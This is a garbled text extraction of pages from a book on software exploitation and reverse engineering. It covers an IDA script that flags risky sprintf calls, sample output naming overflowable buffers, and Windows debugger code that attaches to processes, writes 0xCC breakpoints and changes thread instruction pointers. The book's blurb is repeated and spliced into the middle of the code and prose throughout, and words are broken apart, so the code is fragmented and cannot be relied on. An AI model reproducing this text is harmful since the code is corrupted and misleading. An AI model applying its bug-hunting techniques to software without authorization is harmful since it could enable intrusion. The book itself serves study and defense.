auto my_op; my_op = GetOpnd(ea, 0); How d oes sof t wif(-1 are br eak How do at t acker"sprintf")){ s m ake sof t w ar e br eak on p ur pose? Why are != ?strstr(my_op, fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be ufprintf(output_file, sed t o b reak soft war e? Th"Found is book sprintf p rov ides tcall he answ s. at er 0x%x Ex p lo i t in g S o ftea); w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d checking\n", t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he /* 3 parameters, max backtrace of 20 */ scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t hunt_address(ea, 3, 20, output_file); Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem fprintf(output_file, "-----------------------------------When net w or k secur it y m ech anisms do n ot w or k ----------\n"); At t ack pat t er ns } Rev er se engineer in g } Classic at t acks ag ainst serv er soft w ar e ea = FindCode(ea, 1); Sur pr ising at t acks ag ainst clien t soft war e } Tech niqu es f or cr aft ing m aliciou s inpu t fprintf(output_file, "FINISHED at address 0x%x The t echn ical det ails of b uf fer ov er f low s \n----------------------------------------------\n", last_address); Root k it s fclose(output_file); Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Exit(0); }

The ou t pu t pr od uced by t his simp le bat ch file is placed in a file called report_out.txt f or lat er

The f ile looks som et hing like t his:



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e ---------------------------------------------Sur pr ising at t acks ag ainst clien t soft war e Filename: C:\reversing\of1.idb Tech niqu es f or cr aft ing m aliciou s inpu t HUNTING FROM 401000 TO 404000 The t echn ical det ails of b uf fer ov er f low s ---------------------------------------------Root k it s Found 0x401012 checking Ex p lo i tsprintf in g S o ft wcall a re isat f illed wit h t h e-t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. push number 3, ecx detected subroutine 0x401000

got frame ff00004f

got frame size 32 got frame lvar size 28 got frame args size 0 [esp+1Ch+var_1C] is the target buffer, in frame size 32 bytes •

Table of Content s



I ndex

push number 2, offset unk_403010 Expl oit ing Softw a re How to Br e ak Code

push number 1, eax

By Gr eg Hoglund , Gar y McGr aw

[esp+arg_0] is the source buffer Pub lish er: Addison Wesley

[esp+arg_0] is an that will overflow if larger than 28 bytes! Pub Dat e: February 17, argument 200 4 I SBN: 0- 20 1- 786 95 -8

Exhausted all parameters Pages: 51 2

---------------------------------------------Found sprintf call at 0x401035 - checking How oes sof t w3, areecx br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are push dnumber fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools subroutine can be u sed t0x401020 o b reak soft war e? Th is book p rov ides t he answ er s. detected Ex i t in g Sff000052 o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d gotp lo frame t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . got frame size 292 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he got frame lvar size 288 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t got frame args size 0 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem [esp+120h+var_120] is the target buffer, in frame size 292 bytes When net w or k secur it y m ech anisms do n ot w or k push number 2, offset aSHh At t ack pat t er ns push number 1, eax Rev er se engineer in g [esp+arg_0] is the source buffer Classic at t acks ag ainst serv er soft w ar e [esp+arg_0] is an argument that will overflow if larger than 288 bytes! Sur pr ising at t acks ag ainst clien t soft war e Exhausted all parameters Tech niqu es f or cr aft ing m aliciou s inpu t ---------------------------------------------The t echn ical det ails of b uf fer ov er f low s FINISHED Root kat it s address 0x4011b6 ---------------------------------------------Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. ---------------------------------------------Filename: C:\winnt\MSAGENT\AGENTCTL.idb HUNTING FROM 74c61000 TO 74c7a460 ----------------------------------------------

Found sprintf call at 0x74c6e3b6 - checking push number 3, eax detected subroutine 0x74c6e2f9 got frame ff000eca •

Table of Content s



I ndex

got frame size 568

Expl oit ing Softw a re How to Br e ak Code

got frame lvar size 552 By Gr eg Hoglund , Gar y McGr aw

got frame args size 8 Pub lish er: Addison Wesley

[ebp+var_218] is17,the Pub Dat e: February 200 4target buffer, in frame size 568 bytes I SBN: 0- 20 1- 786 95 -8

push number 2, offset aD__2d Pages: 51 2

push number 1, eax [ebp+var_21C] is the source buffer How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Exhausted all parameters fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ---------------------------------------------Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Searchin g t he fu nct ion calls, w e see a suspect call t o lstrcpy(). An aly zing lot s of code au t om at This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he com mon t r ick t o look f or good st ar t ing places, an d it t ur ns out t o b e ver y useful in p r act ice. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Writing Your Own Cracking Tools Rev er se engineer in g is most ly a t ed ious spor t con sist ing of t hou san ds of sm all st ep s and encom passing b azillions of f act s. The h um an m ind cann ot m anag e all t he dat a n eeded t o do t h is r easonab le w ay. I f y ou' r e lik e m ost p eop le, you ar e going t o need t ools t o help you m anag e all t •dat a. There are Tablequit of Content s b er of d eb ugg ing t ools av ailab le on t h e m ark et an d in f reew are for m e a num •sadly m ost of I ndex t h em do n ot p resen t a comp let e solut ion . For t his r eason , y ou are lik ely t o need t o Expl ing Softw How to Br e ak Code w r itoit e you r ow na ret ools. By Gr eg Hoglund , Gar y McGr aw

Coincident ally , w r it ing t ools is a g reat w ay t o lear n ab out sof t w ar e. Writ in g t ools requ ir es a real un derst an ding of t he ar chit ect ur e of soft w ar e—most imp ort ant , h ow soft w ar e t end s t o b e st ru ct u Pub lish er: Addison Wesley in mem or y and how t he h eap and st ack oper at e. Lear ning by w r it ing t ools is m or e ef ficien t t han Pub Dat e: February 17, 200 4 blind br u t e- f or ce appr oach u sin g p en cil and paper . Your sk ills w ill be bet t er h oned b y t ool cr eat io I SBN: 1-age 786 95( -8 and t h e larv0-al20st lear ning p er iod) w ill not t ake as long. Pages: 51 2

x86 Tools The m ost com m on pr ocessor in most w ork st at ions seem s t o be t he I nt el x 86 f amily , w hich in clu d How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are t he 386 , 486 , and Pent ium ch ips. Ot h er man ufact u rer s also m ak e com p at ible chips. The ch ip s ar fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? fam ily because t hey h ave a subset of f eat ur es t hat are com m on t o all t h e pr ocessor s. This subse What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. called t he x 86 feat ur e set . A pr ogr am t h at is r un ning on an x8 6 p rocessor w ill u su ally hav e a st a heap, and a set of inst r uct ions. Th e x8 6 pr ocessor has r egist er s t h at cont ain m emor y ad dr esses. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d These add resses ind icat e t he locat ion in m emor y w h er e im por t ant dat a st ru ct ur es reside. t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This mBasic ust - h ave bookDebugger m ay shock y ou—and The x86

it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Micr osof t sup plies a r elat iv ely easy - t o- use d eb uggin g API for Win dow s. The API allow s y ou t o ac debu gging evten t s efrex omploit a userodt inue e pr ogr a sim ple loop . The st r uct ur e of t h e pr ogr am Why sof w ar w ill m con t o am be au sing ser ious p r oblem qu it e sim ple: When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e DEBUG_EVENT dbg_evt; Tech niqu es f or cr aft ing m aliciou s inpu t m_hProcess = OpenProcess( PROCESS_ALL_ACCESS | PROCESS_VM_OPERATION, The t echn ical det ails of b uf fer ov er f low s Root k it s

0,

mPID); Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if(m_hProcess == NULL) { _error_out("[!] OpenProcess Failed !\n"); return;

}

// Alright, we have the process opened; time to start debugging. if(!DebugActiveProcess(mPID)) • •

Table of Content s

{

I ndex

Expl oit ing Softw a re How to Br e ak Code

_error_out("[!] DebugActiveProcess failed !\n");

By Gr eg Hoglund , Gar y McGr aw

return; Pub lish er: Addison Wesley

} Dat e: February 17, 200 4 Pub I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

// Don't kill the process on thread exit. // Note: only supported on Windows XP. How fDebugSetProcessKillOnExit(FALSE); d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d while(1) t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack { , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he if(WaitForDebugEvent(&dbg_evt, DEBUGLOOP_WAIT_TIME)) scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem // Handle the debug events. When net w or k secur it y m ech anisms do n ot w or k OnDebugEvent(dbg_evt); At t ack pat t er ns Rev er se engineer in g if(!ContinueDebugEvent( Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e

mPID, dbg_evt.dwThreadId, DBG_CONTINUE))

{ Tech niqu es f or cr aft ing m aliciou s inpu t _error_out("ContinueDebugEvent failed\n"); The t echn ical det ails of b uf fer ov er f low s Root k it s

break;

Ex p lo i t in g S o } ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. } else { // Ignore timeout errors.

int err = GetLastError(); if(121 != err) { _error_out("WaitForDebugEvent failed\n"); •

Table of Content s



I ndex

break;

Expl oit ing Softw a re How to Br e ak Code

}

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

// Exit if debugger has been disabled.

Pages: 51 2

if(FALSE == mDebugActive) { How d oes sof t wbreak; are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools } can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo }i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he RemoveAllBreakPoints(); scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem This code ows how y ou itcan ect t o an ead Whenshnet w or k secur y mconn ech anisms doalr n ot w yorrkunn in g pr ocess. You can also laun ch a pr oc in debug m ode. Eit h er w ay, t he debu ggin g loop is t he sam e: You sim ply w ait f or debu g ev en t s. loop con t inues il t h er e is an err or or t he mDebugActive f lag is set t o TRUE. I n eit h er case, onc At t ack patun t ert ns t he debug ger ex it s, t h e debug ger is aut om at ically det ached f r om t he p r ocess. I f y ou ar e r unn in g Rev er se tengineer in ger is det ached g racefu lly and t he t ar get pr ocess can con t inue ex ecu t in g Wind ows XP, he debugg y ou ar e on an older v er sion of Win dow s, t he debug ger API w ill k ill t he pat ient ( t h e t ar get p roces agsider ainstedserv ar eg t hat t he debu gger API k ills t he t arg et pr ocess on dies) .Classic I n f act at , itt acks is con q uitere soft annw oyin det ach! I n som e people's opinion t his w as a ser ious d esign flaw of t he Micr osof t d eb ugg ing API t Sur pr e ising at tfix acks agver ainst clien soft war e ely , t h is has f in ally been f ix ed in t h e Window s X should hav been ed in sion 0 .0t 1. For t unat v er sion. Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

On Breakpoints Root k it s

Br eak poin t s ar e cen t ral t o d eb ugg in g. Elsew her e in t h e book y ou w ill find r efer en ces t o st andar d Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak br eakp oint t echn iques. A b reak point can b e issued using a sim ple inst r uct ion. Th e st andar d soft w ar e. br eakp oint in st ru ct ion un der x 86 seem s t o b e int er ru pt 3. Th e nice t hing abou t in t er r up t 3 is t ha can be coded as a single b yt e of dat a. Th is m ean s it can be pat ch ed ov er ex ist ing cod e w it h min concer n for t he sur r oun ding code by t es. This br eak point is easy t o set in cod e by copy ing t he or i by t e t o a saf e locat ion and r eplacin g it w it h t he by t e 0xCC. Br eak poin t inst r uct ions ar e som et imes g lob bed t oget her int o blocks an d are wr it t en t o inv alid r eg ions of m emor y . Thu s, if t he pr og ram " accident ally " j um ps t o one of t hese in valid locat ion s, t debu g in t er r up t w ill f ir e. You somet im es see t h is on t he pr og ram st ack in r eg ions bet w een st ack fr am es.

Of cour se, int err up t 3 d oesn' t hav e t o be t he w ay a br eak poin t is h andled. I t cou ld j ust as easily int er ru pt 1, or any t hing for t hat m at t er . Th e int er ru pt s ar e sof t w are d r iv en and t he soft war e of t OS decid es h ow it will h andle t he event . This is cont r olled v ia t h e int er ru pt descr ipt or t ab le ( wh e t he pr ocessor is r unn in g in pr ot ect ed m ode) or t he in t er r up t v ect or t able ( w hen r unn in g in r eal m ode) . To set a br eakp oint , y ou m ust f irst sav e t h e or ig inal inst r uct ion you ar e r eplacin g, t h en w hen yo •r em ov e t h e br Table Content eakof poin t y ous can p ut t he saved inst r uct ion b ack in it s or igin al locat ion . The f ollow i •code illust r atI es ndex sav ing t he orig in al v alue befor e set t ing a b r eak point : Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

//////////////////////////////////////////////////////////////////////////////// // Change the page protection so we can read the original target instruction, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are // then change wes,are fir ew alls, int ru sionit detback ect ionwhen sy st em and done. ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. //////////////////////////////////////////////////////////////////////////////// Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d MEMORY_BASIC_INFORMATION t echniqu es used by bad guy s tmbi; o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . VirtualQueryEx( m_hProcess, This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en*)(m_bp_address), t f ound in m any hack ing book s, you w ill learn abou t (void &mbi, Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem sizeof(MEMORY_BASIC_INFORMATION)); When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns // Now the original byte. Revread er se engineer in g if(!ReadProcessMemory(m_hProcess, Classic at t acks ag ainst serv er soft w ar e *)(m_bp_address), Sur pr ising at t acks(void ag ainst clien t soft war e Tech niqu es f or cr aft &(m_original_byte), ing m aliciou s inpu t The t echn ical det ails 1, of b uf fer ov er f low s Root k it s

NULL))

Ex { p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. _error_out("[!] Failed to read process memory ! \n"); return NULL; }

if(m_original_byte == 0xCC) { _error_out("[!] Multiple setting of the same breakpoint ! \n"); return NULL; •

Table of Content s



I ndex

}

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

DWORD dwOldProtect; Pub lish er: Addison Wesley

// Pub Change protection Dat e: February 17, 200 4back. I SBN: 0- 20 1- 786 95 -8

if(!VirtualProtectEx( m_hProcess, Pages: 51 2

mbi.BaseAddress, mbi.RegionSize, How d oes sof t w are br mbi.Protect, eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war &dwOldProtect ))e? Th is book p rov ides t he answ er s. Ex { p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . _error_out("VirtualProtect failed!"); This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he return NULL; scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k SetBreakpoint(); At t ack pat t er ns Rev er se engineer in g t acks arect e ion so w e can r ead t h e t ar get ad dr ess. I t st or es t he The pClassic r ev ious at code altag erainst s t h e serv memerorsoft y prwot or iginal d at a b yt e. Th e follow ing code t h en ov er w r it es t he m emor y w it h a 0xCC in st r u ct ion . Not ic pr isingt he at tmacks ag ainst t soft t hat wSur e check em ory t o detclien er min e wwar heteher a b r eak point w as alr ead y set befor e w e ar r ived Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. bool SetBreakpoint() { char a_bpx = '\xCC';

if(!m_hProcess) { _error_out("Attempt to set breakpoint without target process"); return FALSE; • •

Table of Content s

}

I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

//////////////////////////////////////////////////////////////////////////// Pub lish er: Addison Wesley Pub e: February 17, page 200 4 //DatChange the

protection so we can write, then change it back.

I SBN: 0- 20 1- 786 95 -8

//////////////////////////////////////////////////////////////////////////// Pages: 51 2 MEMORY_BASIC_INFORMATION mbi; VirtualQueryEx( m_hProcess, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are (void *)(m_bp_address), fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. &mbi, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d sizeof(MEMORY_BASIC_INFORMATION)); t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he (void *)(m_bp_address), scr iptif(!WriteProcessMemory(m_hProcess, k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t &a_bpx, 1, NULL)) { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem char _c[255]; When net w or k secur it y m ech anisms do n ot w or k sprintf(_c, At t ack pat t er ns "[!] Failed to write process memory, error %d ! \n", GetLastError()) Rev er se engineer in g _error_out(_c); Classic at t acks ag ainst serv er soft w ar e return FALSE; Sur pr ising at t acks ag ainst clien t soft war e }Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s if(!m_persistent) Root k it s Ex p lo {i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. m_refcount++; }

DWORD dwOldProtect;

// Change protection back. if(!VirtualProtectEx( m_hProcess, mbi.BaseAddress, mbi.RegionSize, •

Table of Content s



I ndex

mbi.Protect,

Expl oit ing Softw a re How to Br e ak Code

&dwOldProtect ))

By Gr eg Hoglund , Gar y McGr aw

{ Pub lish er: Addison Wesley

_error_out("VirtualProtect Pub Dat e: February 17, 200 4

failed!");

I SBN: 0- 20 1- 786 95 -8

return FALSE;

Pages: 51 2

}

How // d oes sof t w are br eak ? How do at tcache. acker s m ake sof t w ar e br eak on p ur pose? Why are TODO: Flush instruction fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d return TRUE; t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . } This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t The pWhy r ev ious r itploit es t owtill hecon t artget ocess emor sin gle 0xCC b yt e. As an in st ru ct ion , t hi sof tcode w ar ewex inueprt o be amser iousy par oblem t r anslat ed as an in t er r upt 3. We m ust f irst change t he p age pr ot ect ion of t h e t ar get m em ory so w e can wr it enet t owitor. kWe chan h e pr ot ect ion o kt he orig in al v alue bef ore allow ing t he pr ogr When secur it ygemtech anisms do b n ack ot wtor t o con t inue. Th e API calls u sed her e ar e fu lly d ocum en t ed in Microsof t Dev elop er Net w or k ( MSD N ack patage t er ns and wAt e tencour y ou t o ch eck t h em out t here. Rev er se engineer in g

Reading Writing Memory Classic and at t acks ag ainst serv er soft w ar e ising at taacks agpoint ainst , clien soft On ce Sur y ouprhav e hit b reak t he nt ex t twar askeis usually t o ex am in e m em or y . I f you w ant t o u se som e of t he d eb ugg in g t echn iq ues discussed in t his book y ou need t o exam ine m em or y for u ser Techdat niqu f or cr aft ing wmr italiciou inpu t y is easily accom plished in t he Window s env ir onm e supp lied a. es Reading and in g t osm emor using a sim ple API . You can q uer y t o see w hat kin d of m em ory is available an d y ou can also r ea echn ical det ailsr out of bines uf fert hov low s ilar t o memcpy. and wThe r it e tm em or y using at er arf e sim k ittso quer y a m em ory locat ion t o d et er m ine w het her it ' s v alid or w h at p rop er t ies ar e se I f youRoot w ant ( r ead, w r it e, nonp aged, an d so on) y ou can u se t he VirtualQueryEx r ou t ine. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

////////////////////////////////////////////////////////

// Check that we can read the target memory address. //////////////////////////////////////////////////////// bool can_read( CDThread *theThread, void *p ) { • •

Table of Content s I ndex bool ret = FALSE;

Expl oit ing Softw a re How to Br e ak Code By Gr eg MEMORY_BASIC_INFORMATION Hoglund , Gar y McGr aw

mbi;

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

int sz =

I SBN: 0- 20 1- 786 95 -8

Pages: 51 2

VirtualQueryEx( theThread->m_hProcess, (void *)p, &mbi, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? sizeof(MEMORY_BASIC_INFORMATION)); What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu by bad guy s tMEM_COMMIT) o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om if( es used (mbi.State == at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . && This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t(mbi.Protect r eat m en t f ound != in m any hack ing book s, you w ill learn abou t PAGE_READONLY) && Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem (mbi.Protect !=ech PAGE_EXECUTE_READ) When net w or k secur it y m anisms do n ot w or k &&t er ns At t ack pat != PAGE_GUARD) Rev er se (mbi.Protect engineer in g Classic at &&t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst t soft war e (mbi.Protect != clien PAGE_NOACCESS) Tech niqu)es f or cr aft ing m aliciou s inpu t {The t echn ical det ails of b uf fer ov er f low s Root k it s ret = TRUE; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w}ar e. return ret; }

The ex am ple fu nct ion will d et er m ine w het her t h e m em or y add r ess is r eadable. I f you w ant t o re w r it e t o m em ory you can use t he ReadProcessMemory an d WriteProcessMemory API calls.

Debugging Multithreaded Programs I f t he p rog ram has m ult ip le t hr ead s, you can con t r ol t he behav ior of each indiv idual t hr ead •( som et h ing tTable of ver Content s ul w h en at t ack in g mor e m oder n cod e) . Ther e are API calls f or hat is y helpf •m anipu lat in gI ndex t he t h read. Each t hr ead has a CONTEXT. A con t ext is a d at a st r uct ur e t h at cont r ols Expl oit ting a re How e akt he Code im por antSoftw pr ocess dattoa Br like cur r en t in st r uct ion point er . By m odif yin g an d quer ying cont ex t st rGruct es, you can conaw t rol and t r ack all t he t hr ead s of a m ult it h readed pr ogr am . Here is an ex a By egur Hoglund , Gar y McGr of set t in g t he inst r uct ion point er of a giv en t hr ead: Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

bool How dSetEIP(DWORD oes sof t w are br theEIP) eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? { What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo CONTEXT i t in g S o ctx; ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack HANDLE , y ou mhThread u st fir st lear = n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he fOpenThread( scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t THREAD_ALL_ACCESS, Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem FALSE, When net w or k secur it y m ech anisms do n ot w or k m_thread_id At t ack pat t er ns ); Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e if(hThread == NULL) Sur pr ising at t acks ag ainst clien t soft war e { Tech niqu es f or 